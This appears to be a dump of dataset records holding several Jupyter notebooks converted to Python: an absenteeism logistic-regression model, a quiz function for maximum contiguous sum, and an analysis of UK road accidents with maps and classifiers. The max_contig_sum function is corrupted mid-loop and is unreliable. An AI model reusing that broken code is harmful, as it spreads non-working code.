xgb.XGBRegressor(random_state=42)\n\nxgb_model.fit(X_train, y_train)\nxgboost_yhat = xgb_model.predict(X_test)\n\n# + [markdown] id=\"66Q7Ru0ImvC-\"\n# Model Metrics\n#\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"zd2rh5pcmw5O\" outputId=\"5ec97551-5f4e-45f6-e491-921485794cac\"\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\nprint(confusion_matrix(y_test,xgboost_yhat.round()))\nprint(classification_report(y_test,xgboost_yhat.round()))\nprint(accuracy_score(y_test, xgboost_yhat.round()))\n","repo_name":"DebopriyoMukhopadhyay/readytolearn","sub_path":"ReadyToLearn.ipynb","file_name":"ReadyToLearn.ipynb","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"8312582205","text":"# ### Creating a logistic regression to predict absenteeism\n\n# #### Import the relevant libraries\n\nimport pandas as pd\nimport numpy as np\n\n# #### Load the data\n\ndata_preprocessed = pd.read_csv('C:/Users/Samuel Mwaniki/Downloads/Compressed/Data Scie/part_8_case_study/S53_L379/df-preprocessed.csv')\n\ndata_preprocessed.head()\n\n# #### Create the targets\n#\n# np.where(condition,value if True, value if False)\n# -.checks if a condition has been satisfied and assigns a value accordingly\n\n# the median value of absenteeism time in hours to use it as a cut-off line\ndata_preprocessed['Absenteeism Time in Hours'].median()\n\ntargets = np.where(data_preprocessed['Absenteeism Time in Hours'] > \n data_preprocessed['Absenteeism Time in Hours'].median(), 1,0)\n\ntargets\n\ndata_preprocessed['Excessive Absenteeism'] = targets\n\ndata_preprocessed.head()\n\n# #### A comment on the targets\n\n#the dataset should be balanced for the two outputs: it will prevent the model from learning to output only 0s or only 1s\n# we check by dividing the no_ of targets equal to 1 with the sum of all targets\ntargets.sum() / targets.shape[0]\n\n# dropping the absenteeism time in hours column\ndata_with_targets = data_preprocessed.drop(['Absenteeism Time in Hours','Day of the Week','Daily Work Load Average','Distance to Work'],axis=1)\n\n#checking if the data_with_targets is the same as data_preprocessed (False/True?)\ndata_with_targets is data_preprocessed\n\ndata_with_targets.head()\n\n# #### Select the inputs for regression\n\ndata_with_targets.shape\n\n#to select just the first 14 columns\ndata_with_targets.iloc[:,:14]\n\n# select all columns until -1 (same as above) (by putting a - it shows how many columns we want to skip from the end)\ndata_with_targets.iloc[:,:-1]\n\nunscaled_inputs = data_with_targets.iloc[:,:-1]\n\n# #### Standardize the data\n\n# +\n#from sklearn.preprocessing import StandardScaler\n\n#absenteeism_scaler = StandardScaler()\n\n# +\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import StandardScaler\n\n# create the Custom Scaler class\n\nclass CustomScaler(BaseEstimator,TransformerMixin): \n \n # init or what information we need to declare a CustomScaler object\n # and what is calculated/declared as we do\n \n def __init__(self,columns,copy=True,with_mean=True,with_std=True):\n \n # scaler is nothing but a Standard Scaler object\n self.scaler = StandardScaler(copy,with_mean,with_std)\n # with some columns 'twist'\n self.columns = columns\n self.mean_ = None\n self.var_ = None\n \n \n # the fit method, which, again based on StandardScale\n \n def fit(self, X, y=None):\n self.scaler.fit(X[self.columns], y)\n self.mean_ = np.mean(X[self.columns])\n self.var_ = np.var(X[self.columns])\n return self\n \n # the transform method which does the actual scaling\n\n def transform(self, X, y=None, copy=None):\n \n # record the initial order of the columns\n init_col_order = X.columns\n \n # scale all features that you chose when creating the instance of the class\n X_scaled = pd.DataFrame(self.scaler.transform(X[self.columns]), columns=self.columns)\n \n # declare a variable containing all information that was not scaled\n X_not_scaled = X.loc[:,~X.columns.isin(self.columns)]\n \n # return a data frame which contains all scaled features and all 'not scaled' features\n # use the original order (that you recorded in the beginning)\n return pd.concat([X_not_scaled, X_scaled], axis=1)[init_col_order] \n# -\n\nunscaled_inputs.columns.values\n\ncolumns_to_scale = ['Month Value', 'Transportation Expense', 'Age', 'Body Mass Index', 'Education',\n 'Children', 'Pets']\n\n\nabsenteeism_scaler = CustomScaler(columns_to_scale)\n\n#this will calculate and store the mean and the standard deviation\n#whenever you get new data you will know that the standardization information is contained in absenteeism_scaler\nabsenteeism_scaler.fit(unscaled_inputs)\n\n\n# .transform() does the actual scaling\nscaled_inputs = absenteeism_scaler.transform(unscaled_inputs)\n\nscaled_inputs\n\nscaled_inputs.shape\n\n# ### Split the data into Train and Test and Shuffle\n\n# #### Import the relevant module\n\n# this module splits arrays or matrices into train and test subsets\nfrom sklearn.model_selection import train_test_split\n\n# #### Split\n\n# +\n#sklearn.mode_selection.train_test_split(inputs,targets)\ntrain_test_split(scaled_inputs, targets)\n\n#array 1: a training dataset with inputs\n#array 2: a training dataset with targets\n#array 3: a trest dataset with inputs\n#array 4: a test dataset with targets\n# -\n\n##sklearn.mode_selection.train_test_split(inputs,targets, train_size, shuffle=True, random_state\nx_train, x_test, y_train, y_test = train_test_split(scaled_inputs, targets, train_size = 0.8, random_state=20)\n\nprint (x_train.shape, y_train.shape)\n\nprint (x_test.shape, y_test.shape)\n\n# ### Logistic regression with sklearn\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\n# #### Train the model\n\nreg = LogisticRegression()\n\n#sklearn.linear_model.LogisticRegression.fit(x,y) fits the model according to the given training data\nreg.fit(x_train,y_train)\n\n#to evaluate the model's accuracy\n#sklearn.linear_model.LogisticRegression.score(inputs,targets) returns the mean accuracy on the given test data and labels\nreg.score(x_train,y_train)\n\n# #### Manually check the accuracy\n#\n# sklearn.linear_model.LogisticRegression.predict(inputs)\n# -> predicts class labels(logistic regression outputs) for given input samples\n\n#finding the predicted outputs of the regression\nmodel_outputs = reg.predict(x_train)\nmodel_outputs\n\ny_train\n\nmodel_outputs == y_train\n\n#total number of correct predictions(True entries)\nnp.sum((model_outputs==y_train))\n\n# to get accuracy (Accuracy = Correct predictions /#observations)\nnp.sum((model_outputs==y_train)) / model_outputs.shape[0]\n\n# #### Finding the intercept and coefficients\n#\n\n# + active=\"\"\n# log(odds) = Bo + B1x1 + B2x2 + ... + BkXk\n# | |\n# Intercept Coefficient\n# (bias) (weights)\n# -\n\nreg.intercept_\n\nreg.coef_\n\nunscaled_inputs.columns.values\n\nfeature_name = unscaled_inputs.columns.values\n\n# +\nsummary_table = pd.DataFrame (columns=['Feature name'],data = feature_name)\n\nsummary_table['Coefficient'] = np.transpose(reg.coef_)\n\nsummary_table\n# -\n\n#adding the intercept\nsummary_table.index = summary_table.index + 1\n# # +1 will shift all indices by 1\nsummary_table.loc[0] = ['Intercept', reg.intercept_[0]]\nsummary_table = summary_table.sort_index()\nsummary_table\n\n# #### Interpreting the coefficients\n\n#adding exponentials of the coefficients to our table\nsummary_table['Odds_ratio'] = np.exp(summary_table.Coefficient)\n\nsummary_table\n\n#DataFrame.sort_values(Series) sorts the values in a data frame with respect to a given column(Series)\nsummary_table.sort_values('Odds_ratio', ascending=False)\n\n# #### Testing the model\n\n#test accuracy is normally lower than the train accuracy (due to overfitting)\nreg.score(x_test,y_test)\n\n# +\n#to get the output\n#model_outputs = reg.predict(x_test)\n#model_outputs\n#or\n\n# use sklearn.linear_model.LogisticRegression.predict_proba(x) -(it returns the probability estimates for all possible outputs(classes))\n\npredicted_proba = reg.predict_proba(x_test)\npredicted_proba\n# -\n\npredicted_proba.shape\n\npredicted_proba[:,1]\n\n# ### Save the model\n# ###### pickle [module]\n# is a python module used to convert a python object into a character stream\n\nimport pickle \n\n#model-file name wb- write bytes dump -'save' reg - object to be dumped\nwith open('model', 'wb') as file:\n pickle.dump(reg, file)\n\nwith open('scaler', 'wb') as file:\n pickle.dump(absenteeism_scaler, file)\n\n \n","repo_name":"bennlab/Absenteeism-Prediction-Model","sub_path":"Absenteeism Model - Logistic Regression .ipynb","file_name":"Absenteeism Model - Logistic Regression .ipynb","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"11169894732","text":"def max_contig_sum(L):\n \"\"\" L, a list of integers, at least one positive\n Returns the maximum sum of a contiguous subsequence in L \"\"\"\n #YOUR CODE HERE\n max_num = 0\n flag = 0\n for i in range(0,len(L)):\n flag = L[i]\n if flag > max_num:\n max_num = flag\n \n j = i+1\n while(j max_num:\n max_num = flag\n j += 1\n return max_num\n \n\n\nmax_contig_sum([3, 4, -1, 5, -4])\n\nmax_contig_sum([3, 4, -8, 15, -1, 2])\n\n\n","repo_name":"Synrhr/Algorithm-Review","sub_path":"MIT 6.00.2x maximum sum of a contiguous subsequence (QUIZ 4).ipynb","file_name":"MIT 6.00.2x maximum sum of a contiguous subsequence (QUIZ 4).ipynb","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"73989988891","text":"# + _cell_guid=\"b1076dfc-b9ad-4769-8c92-a6c4dae69d19\" _uuid=\"8f2839f25d086af736a60e9eeb907d3b93b6e0e5\"\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# + _cell_guid=\"79c7e3d0-c299-4dcb-8224-4455121ee9b0\" _uuid=\"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a\"\naccidents = pd.read_csv('../input/Accidents 2012-2016.csv')\n\n# + _uuid=\"0ad81fb9b7924a3bbfb3a28fd1869fe65e819440\"\nvehicles = pd.read_csv('../input/Vehicles in Accidents 2012-2016.csv')\n\n# + _uuid=\"b5595beb5429aae5f7fdfbb834143c3388caf9e3\"\nprint(accidents.shape)\nprint(vehicles.shape)\n\n\n# + _uuid=\"1df5183699ab21fa7372da0f46a32854e58df57d\"\naccidents.head(3)\n\n# + _uuid=\"a6174a1c8bcf08c4110433ba326f6ed7a73767e7\"\nvehicles.head(3)\n\n# + [markdown] _uuid=\"6c43002368c602bcee37c53b7d263b0a1539a931\"\n# Σαν ένα πρώτο βήμα θα διαγράψουμε κάποιες στήλες του συνόλου δεδομένων οι οποίες δε μας βοηθούν στην ανάλυση που θα πραγματοποιήσουμε παρακάτω.\n\n# + _uuid=\"e3b99be607f10e58512479572eaa5d118f7e0a25\"\naccidents.isna().sum()\n\n# + _uuid=\"10df8616bd2f2948662e03b8b660d65eb3aa23c8\"\naccidents = accidents.drop(['2nd_Road_Class',\\\n '2nd_Road_Number',\\\n 'Carriageway_Hazards',\\\n 'Did_Police_Officer_Attend_Scene_of_Accident',\\\n 'Local_Authority_(District)',\\\n 'Local_Authority_(Highway)',\\\n 'Location_Easting_OSGR',\\\n 'Location_Northing_OSGR',\\\n 'LSOA_of_Accident_Location',\\\n 'Pedestrian_Crossing-Human_Control',\\\n 'Pedestrian_Crossing-Physical_Facilities',\\\n 'Police_Force',\\\n 'InScotland',\\\n 'Special_Conditions_at_Site',\\\n ]\n ,axis =1 )\n\n# + _uuid=\"d060b6979f5636b8aa7d712d811f4230d4901ba8\"\n# Remove rows with NAs\nprint(accidents.shape)\naccidents = accidents.dropna()\nprint(accidents.shape)\n\n# + _uuid=\"f73ea84a4cd1401d2524088d77aa627cff37dbad\"\n# accidents.isna().sum()\n\n# + [markdown] _uuid=\"4bf95a9a1e65dfe2dce36b554dbf1110771767ce\"\n# Στη συνέχεια θα κάνουμε κάποιες μετατροπές στους τύπους δεδομένων ορισμένων στήλων. Για παράδειγμα πολλές μεταβλητές λαμβάνουν συγκεκριμένες τιμές οπότε θα τις μετατρέψουμε σε κατηγορικές.\n\n# + _uuid=\"d2bae7963f89bb443645e8c36fcd98ee0f1e2e32\"\n#Data type conversion\naccidents = accidents.astype({'Accident_Index': 'str', \\\n '1st_Road_Class':'category'\n ''\n })\nprint(accidents.dtypes)\n\n# + _uuid=\"33182b643d644d234c7fc68918db05b1d4eac75d\"\nlevel3 = accidents[accidents['Accident_Severity'] == 'Slight']\nlevel2 = accidents[accidents['Accident_Severity'] == 'Serious']\nlevel1 = accidents[accidents['Accident_Severity'] == 'Fatal']\n\nf, (ax1,ax2,ax3) = plt.subplots(1,3,figsize=(15,9))\n\n## Slight plot\nlevel3.plot(kind='scatter', x='Longitude',y ='Latitude',\n color='yellow', \n s=.02, alpha=.6, subplots=True, ax=ax1)\nax1.set_title(\"Slight\")\nax1.set_facecolor('black')\n\n## Serious plot\nlevel2.plot(kind='scatter', x='Longitude',y ='Latitude',\n color='yellow', \n s=.02, alpha=.6, subplots=True, ax=ax2)\nax2.set_title(\"Serious\")\nax2.set_facecolor('black')\n\n# Fatal plot\n\nlevel1.plot(kind='scatter', x='Longitude',y ='Latitude',\n color='yellow', \n s=.02, alpha=.6, subplots=True, ax=ax3)\nax3.set_title(\"Fatal\")\nax3.set_facecolor('black')\n\n\n\n\nf.show()\n\n# + _uuid=\"338de9df3d23ce03451e6d68e79e2a274f311517\"\nag = accidents.groupby('Accident_Severity').Road_Type.value_counts().sort_index()\n\n# + _uuid=\"e09d8494c19898c3cb304bea6308dd42322f8529\"\nag.unstack()\n\n# + _uuid=\"e7dcc1058004e5644c12ae647f278a39979737af\"\nag.unstack().plot(kind='bar', subplots=True, layout=(3,2),figsize= (10,10))\nplt.show()\n\n# + _uuid=\"2dd9a06c9cc4f58ff3759f59094bebc0004bd100\"\n# ag1 =accidents.groupby('Accident_Severity').Accident_Severity.value_counts().sort_index()\n# ag.unstack().plot(kind='pie', subplots=True,layout = (2,2) ,figsize= (13,13))\n# plt.show()\n\na =plt.pie(accidents.Accident_Severity.value_counts(), )\nplt.show()\n\n# + _uuid=\"717580479fc70731c84881191fe5432e353c4e46\"\nag = accidents.Accident_Severity.value_counts().sort_index()\n\nplt.figure(figsize=(7,7))\nag.plot(kind='pie', subplots=True,figsize= (13,13))\nplt.title('Accident Severity' , fontsize= 20)\nplt.grid(False)\n# plt.ylabel('Accident count' , fontsize = 20)\n# plt.xlabel('0 - Sunday , 1 - Monday ,2 - Tuesday , 3 - Wednesday , 4 - Thursday , 5 - Friday , 6 - Saturday' , fontsize = 13)\n\n\n# + _uuid=\"f7094e5ad6c52d7ce0cf4f5d50967ba9db13fc2c\"\nag = accidents.groupby('Accident_Severity').Day_of_Week.value_counts().sort_index()\n# ag.unstack()\nag.unstack().plot(kind='pie', subplots=True, layout=(3,3),figsize= (13,13))\nplt.show()\n\n# + _uuid=\"ac09ab3b834524eb0e0e8b38b828b8c92c78db73\"\nag = accidents.Day_of_Week.value_counts().sort_index()\nag.plot(kind='pie',figsize= (7,7))\n\n# + _uuid=\"c15e1f53c190c6c7319fdf950048b02c94eeaf25\"\nag = accidents.groupby('Accident_Severity').Urban_or_Rural_Area.value_counts().sort_index()\nag.unstack()\nag.unstack().plot(kind='pie', subplots=True, layout=(3,3),figsize= (13,13))\nplt.show()\n\n# + _uuid=\"b00bfcafcc05d9ef190690fee767202a24a37cb7\"\nyear_wise_casualties = accidents.groupby(['Year'])['Number_of_Casualties'].sum()\nyear_wise_casualties = year_wise_casualties.reset_index()\nyear_wise_casualties\n\n# + _uuid=\"65867a71bb9944def6e11893b762400f69c7cabf\"\n# names = ['0 - 5','6 - 10','11 - 15','16 - 20','21 - 25','26 - 35','36 - 45','46 - 55','56 - 65','66 - 75','Over 75','Data missing or out of range']\nag = vehicles.groupby('Age_Band_of_Driver').Sex_of_Driver.value_counts().sort_index()\nag.unstack().plot(kind='bar', stacked =True, layout=(4,4),figsize= (16,16))\nplt.show()\n\n# + _uuid=\"342e89ec9e618a93861a95719c33451c9037ec83\"\nag = vehicles.groupby('Age_Band_of_Driver').Sex_of_Driver.value_counts().sort_index()\nag.unstack()\n\n# + _uuid=\"14fe9e582ce3213b3e78b6b6291d56eeeb8b71f2\"\nimport warnings\nwarnings.filterwarnings('ignore')\n# graphing and visualization\n\nimport folium\nimport folium.plugins as plugins\n# from mpl_toolkits.basemap import Basemap\n\n# import heapq \n\n# + _uuid=\"9a0d434331af7d82b24c5cc49c310306566d0de0\"\n# accidents.head(3)\n\n# + _uuid=\"47da787ec44b7ec5c37246ebb37394e1b0d08005\"\ndata=[]\ntempdf = accidents.sample(30000)\ntempdf[\"Time\"]= tempdf[\"Time\"].astype(str)\ntempdf['Time']= tempdf['Time'].str.slice(0,2, 1)\ntempdf[\"Time\"]= tempdf[\"Time\"].astype(int)\n\ncsts=list(tempdf['Time'].unique())\nfor row in csts:\n subset=tempdf[tempdf['Time']==row]\n data.append(subset[['Latitude','Longitude']].values.tolist())\n\n# for i in range(10):\n# temp = accidents[i]\n# data.append(temp[['Latitude','Longitude']].values.tolist())\n \n# lat = 52.476672\n# lon = -1.856415\nlat = 53.976672\nlon = -1.856415\n\nzoom_start = 6\nprint(\"Accidents during the Time of Day\")\nindx=[]\nfor i in range(1,24):\n indx.append(str(i)+':00')\nindx.append('00:00')\n# lat and lon varaibles , is where the animation begins.\nm = folium.Map(location=[lat, lon], tiles=\"Cartodb dark_matter\", zoom_start=zoom_start)\n#inprovising the Heatmapwith time plugin to show variations across star ratings \n# hm = plugins.HeatMapWithTime(data,max_opacity=0.3,auto_play=True,display_index=True,radius=10,max_speed=0.1)\nhm = plugins.HeatMapWithTime(data,radius=5,index=indx, scale_radius = False,\\\n max_opacity=0.7,auto_play=True,display_index=True,index_steps = 1,max_speed=0.1)\nhm.add_to(m)\nm\n\n# + _uuid=\"ff7f50617d924b38ab7115b45f4948b8b6d844ab\"\naccidents.shape\n\n\n# + _uuid=\"b09db80da438c1d52ef9689d9b86aafb46241ab4\"\n\n\n# + _uuid=\"400d1424e067285e3eeab385eefe9f7cdca85b9c\"\nimport seaborn as sn\n\n# + _uuid=\"effbcf37f30aea886a496d424bf593b6de713278\"\nveh_temp = pd.DataFrame()\nveh_temp[\"Age_Band_of_Driver\"] = vehicles[\"Age_Band_of_Driver\"]\nveh_temp[\"Age_of_Vehicle\"] = vehicles['Age_of_Vehicle']\nveh_temp[\"Sex_of_Driver\"] = vehicles[\"Sex_of_Driver\"]\nveh_temp[\"Vehicle_Type\"] = vehicles[\"Vehicle_Type\"]\n\nveh_temp['Age_Band_of_Driver'] = pd.Categorical(veh_temp['Age_Band_of_Driver'], categories=['0 - 5','6 - 10','11 - 15','16 - 20','21 - 25','26 - 35', '36 - 45','46 - 55','56 - 65','66 - 75','Over 75','Data missing or out of range'], ordered=True)\n\nMale = veh_temp[veh_temp['Sex_of_Driver'] == 'Male'][\"Age_Band_of_Driver\"].value_counts().sort_index()\nFemale = veh_temp[veh_temp['Sex_of_Driver'] == 'Female'][\"Age_Band_of_Driver\"].value_counts().sort_index()\n\nfig, ax = plt.subplots(figsize=(12,7))\nind = np.arange(len(Male)-1)\nwidth = 0.4 \np1 = ax.bar(ind, Male[0:11].values, width, color='b')\np2 = ax.bar(ind + width, Female[0:11].values, width,color='r')\n\nplt.title(\"Drivers Age Bands\")\nax.set_xticks(ind + width / 2)\nax.set_xticklabels(Male[0:11].index)\nplt.ylabel(\"Count\")\nplt.xlabel(\"Age Band\")\nplt.legend(['Male', 'Female'], loc='upper right')\nplt.show()\n\nType = veh_temp[\"Vehicle_Type\"].value_counts().sort_index()\nlabels = list(Type.index)\ndata = list(Type.values)\n\nplt.figure(1, figsize=(8,5))\nwedges, texts = plt.pie(data,startangle=90)\nplt.title(\"Pie Chart of Vehicle Types\")\nplt.legend(wedges, labels,\n title=\"Vehicle Types\",\n loc=\"best\",\n bbox_to_anchor=(1, 0, 0.5, 1))\nplt.show()\n\n\nAges = pd.DataFrame(veh_temp['Age_of_Vehicle'])\nAges = Ages.dropna()\nplt.figure(1, figsize=(15,8))\nsn.distplot(Ages)\n\n\nveh_temp['Age_Band_of_Driver'] = pd.Categorical(veh_temp['Age_Band_of_Driver'], categories=['0 - 5','6 - 10','11 - 15','16 - 20','21 - 25','26 - 35', '36 - 45','46 - 55','56 - 65','66 - 75','Over 75','Data missing or out of range'], ordered=True)\n\n\nMale = veh_temp[veh_temp['Sex_of_Driver'] == 'Male'][\"Age_Band_of_Driver\"].value_counts().sort_index()\nFemale = veh_temp[veh_temp['Sex_of_Driver'] == 'Female'][\"Age_Band_of_Driver\"].value_counts().sort_index()\n\nfig, ax = plt.subplots(figsize=(10,5))\n\nplt.bar(Male[0:11].index, Male[0:11].values, alpha=0.75)\nplt.bar(Female[0:11].index, Female[0:11].values, alpha=0.75)\nplt.title(\"Drivers Age Bands\")\nplt.ylabel(\"Count\")\nplt.xlabel(\"Age Band\")\nplt.legend(['Male', 'Female'], loc='upper right')\nplt.show()\n\n# + _uuid=\"080be83f38ef6cc25adefcf3abe10c9e93da962d\"\n# import cityphi.application\n\n# + _uuid=\"528c140b60d030d64fb93032ecfdc0574e221c9e\"\n\n\n# + _uuid=\"6f9bc6715e30e991b3e481653e73cf622389c9e3\"\n\n\n# + _uuid=\"16f52c95a31e816d8a414c41f8b596b33d1b619f\"\n\n\n# + _uuid=\"52adfc4b266e4975cb486ff28d04644157d49945\"\n\n\n# + _uuid=\"a7fa89ebe6ac365370ac85fb828696ec8f0c4bca\"\n\n\n# + _uuid=\"599d2285a7346fce63f008ccb2281b8132adc4fc\"\n\n\n# + _uuid=\"af0b0c0f4e90a283a280ec5be15c5774b3d999da\"\naccidents_ML = accidents.drop(['Accident_Index',\\\n 'Number_of_Casualties',\\\n 'Light_Conditions',\\\n '1st_Road_Number',\\\n 'Date',\\\n 'Latitude',\\\n 'Junction_Control',\\\n 'Junction_Detail',\\\n 'Longitude',\\\n 'Year'],axis =1)\n\n# + _uuid=\"12c461fca82e6bef75a3c4de9628bec88294ddb0\"\naccidents_categorical = accidents_ML.drop(['Number_of_Vehicles',\\\n 'Speed_limit',\\\n 'Time'],axis =1)\n\nfrom scipy.stats import chi2_contingency\navailable_features = [feature for feature in accidents_categorical.columns]\n\nchi2_matrix = []\nindex = []\n\nfor feature_a in available_features:\n index.append(feature_a)\n row = []\n for feature_b in available_features:\n contingency = pd.crosstab(accidents_categorical[feature_a],\n accidents_categorical[feature_b])\n #acceptance level is 0.05\n p = chi2_contingency(contingency)[1]\n row.append(p)\n chi2_matrix.append(row)\n \nchi2_p_values = pd.DataFrame(chi2_matrix, columns=index, index=index)\nchi2_p_values\n\n# + _uuid=\"00f86e814920032d13f2eaca59d16af9a40b3b48\"\n\n\n# + _uuid=\"8cd78ee729e1d5a71088e6abfcaddf2dbcfa7673\"\naccidents_ML.shape\n\n# + _uuid=\"a7632d4c201109b79465cd7bef0ef0fb2c419724\"\naccidents_ML.head(3)\n\n# + _uuid=\"1e6c29d4ddb751d6330e75594bba3707e6656404\"\n# labels = accidents_ML.Accident_Severity.tolist()\n# labels[0:5]\n\n# + _uuid=\"2dd075d044cdac221114ce015af246851a9759c8\"\ncol = ['1st_Road_Class','Day_of_Week','Road_Surface_Conditions','Road_Type','Urban_or_Rural_Area','Weather_Conditions']\nX = pd.get_dummies(accidents_ML, columns=col)\n# X = X.drop(['Accident_Severity'],axis=1)\nX.head(5)\n\n# + _uuid=\"5aabd2688a1e164be64869781ae848e04b4c7f92\"\nX[\"Time\"]= X[\"Time\"].astype(str)\nX['Time']= X['Time'].str.slice(0,2, 1)\nX[\"Time\"]= X[\"Time\"].astype(int)\n\n# + _uuid=\"43e4f55a3c70718915163f7306318bbdd68e4d03\"\nX.head(5)\nX.shape\n\n# + _uuid=\"36ff9c6aecce45d4f6213dc6e6bf3fbaba127e24\"\nX[\"Speed_limit\"]= X[\"Speed_limit\"].astype(int)\nX.head(5)\n\n\n# + _uuid=\"eb262c59d98f6f178fad69f3f8dbc31903d86e00\"\nX2 = pd.DataFrame(X)\n\n# + _uuid=\"004dea6bd0168d63e4bf68c9ebc896d7702bca30\"\n# Class count\ncount_slight, count_serious, count_fatal = X.Accident_Severity.value_counts()\n\nprint(count_slight,count_serious, count_fatal)\n\n# Divide by class\ndf_slight = X[X['Accident_Severity'] == 'Slight']\ndf_serious = X[X['Accident_Severity'] == 'Serious']\ndf_fatal = X[X['Accident_Severity'] == 'Fatal']\n\n# + _uuid=\"2048e33a7d028f63a2925c8d7b1625f7d1168fe2\"\ndf_slight_under = df_slight.sample(count_fatal)\ndf_serious_under = df_serious.sample(count_fatal)\n\ntrain_under = pd.concat([df_slight_under, df_serious_under, df_fatal], axis=0)\n\nprint('Random under-sampling:')\nprint(train_under.Accident_Severity.value_counts())\n\ntrain_under.Accident_Severity.value_counts().plot(kind='bar', title='Count (Accident Severity)');\n\n# + _uuid=\"cdfa9d26d1615c07b98bc5f380dc36a40a7fa760\"\nX = train_under\n\n# + _uuid=\"748e17baca07497dd714b4c77e63eafb1788e898\"\n# Split the training dataset in 80% / 20%\nfrom sklearn.model_selection import train_test_split\ntrain_set, test_set = train_test_split(X, test_size=0.1, random_state=42)\n\n# + _uuid=\"bc8f8debe4ff5f2690967fc3e50bee42168e6c02\"\n# Separate labels from the rest of the dataset\ntrain_set_labels = train_set[\"Accident_Severity\"].copy()\ntrain_set = train_set.drop(\"Accident_Severity\", axis=1)\n\ntest_set_labels = test_set[\"Accident_Severity\"].copy()\ntest_set = test_set.drop(\"Accident_Severity\", axis=1)\n\n# + _uuid=\"6ec173663c7807b09eabf7c33cccdd61803b23bd\"\n# Apply a scaler\nfrom sklearn.preprocessing import MinMaxScaler as Scaler\n\nscaler = Scaler()\n\nscaler.fit(train_set)\n\ntrain_set_scaled = scaler.transform(train_set)\ntest_set_scaled = scaler.transform(test_set)\n\n# + _uuid=\"d715d535d11b4d6b4ec2a2b3af998c002081ae1c\"\ndf = pd.DataFrame(data=train_set_scaled)\ndf.shape\n\n# + _uuid=\"d30b922ae1d26ef8aef01167d66300a80abb0299\"\n# train_set_labels\n\n# + _uuid=\"28cb42c78660443bb81ab8dee4566b4d2b85ece9\"\nfrom sklearn.preprocessing import LabelEncoder\n\nle = LabelEncoder()\ny_train = le.fit_transform(train_set_labels)\ny_train\n\n# + _uuid=\"da25522fc95280250ef7ee0c0f1da88800897d30\"\n# Import all the algorithms we want to test\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\n# + _uuid=\"50e2821cd3c4a899ecf4b34370bb742937e9bb2b\"\n# Import the slearn utility to compare algorithms\nfrom sklearn import model_selection\n\n# Prepare an array with all the algorithms\nmodels = []\nmodels.append(('LR', LogisticRegression()))\nmodels.append(('RFC', RandomForestClassifier())) \nmodels.append(('DTC', DecisionTreeClassifier())) \n\n# + _uuid=\"6abee97c3725a1617911b581aae94e62ff3481f6\"\n# Prepare the configuration to run the test\nseed = 7\nresults = []\nnames = []\nX_train = train_set_scaled\n\n# + _uuid=\"e326d822e92ae9a9d4cc7c8ee3a64753bdc98a5b\"\n# Every algorithm is tested and results are\n# collected and printed\nfrom sklearn.metrics import cohen_kappa_score, make_scorer\nkappa_scorer = make_scorer(cohen_kappa_score)\n\nfor name, model in models:\n kfold = model_selection.KFold(n_splits=10, random_state=seed)\n# cv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring=kappa_scorer,n_jobs = -1)\n cv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring='balanced_accuracy',n_jobs = -1)\n results.append(cv_results)\n names.append(name)\n msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n print(msg)\n\n# + _uuid=\"3d3921d521cf4e8675f21c9bf591855358002dc3\"\n# boxplot algorithm comparison\nfig = plt.figure()\nfig.suptitle('Algorithm Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results) \nax.set_xticklabels(names)\nplt.show()\n\n# + _uuid=\"8782f2725e7edd6338d7b8236d58a19dd978c805\"\nx_test = test_set_scaled\ny_test = le.fit_transform(test_set_labels)\ny_test\n\n# + _uuid=\"b2bcfd0c5a03fb3385fb2e06fc8514ff4428d53f\"\nmodels[0][1].fit(X_train, y_train)\n\nmodels[1][1].fit(X_train, y_train)\n\nmodels[2][1].fit(X_train, y_train)\n\n# + _uuid=\"ba790824c56a13717590876ec59484a2af8a4758\"\nfrom sklearn.metrics import balanced_accuracy_score\n\npredictions_LR = models[0][1].predict(x_test)\n# score1 = cohen_kappa_score(predictions_LR, y_test)\nscore1 = balanced_accuracy_score(predictions_LR, y_test)\nprint(\"Logistic Regression Test Accuracy:\",score1)\n\npredictions_RFC = models[1][1].predict(x_test)\n# score2 = cohen_kappa_score(predictions_RFC, y_test) \nscore2 = balanced_accuracy_score(predictions_RFC, y_test)\nprint(\"Random Forest Test Accuracy:\",score2)\n\npredictions_DTC = models[2][1].predict(x_test)\n# score3 = cohen_kappa_score(predictions_DTC, y_test) \nscore3 = balanced_accuracy_score(predictions_DTC, y_test)\nprint(\"Decision Tree Test Accuracy:\",score3)\n\n# + _uuid=\"de7ba9d8a17244484463d4b3808dacc329f27061\"\nimport seaborn as sns\nfrom sklearn import metrics\n\ncm_LR = metrics.confusion_matrix(y_test, predictions_LR)\nprint(cm_LR)\ncm_RFC = metrics.confusion_matrix(y_test, predictions_RFC)\nprint(cm_RFC)\ncm_DTC = metrics.confusion_matrix(y_test, predictions_DTC)\nprint(cm_DTC)\n\n# + _uuid=\"6e32f46b6a529ff712d4d2e8cbce1874617528d9\"\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_LR, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted 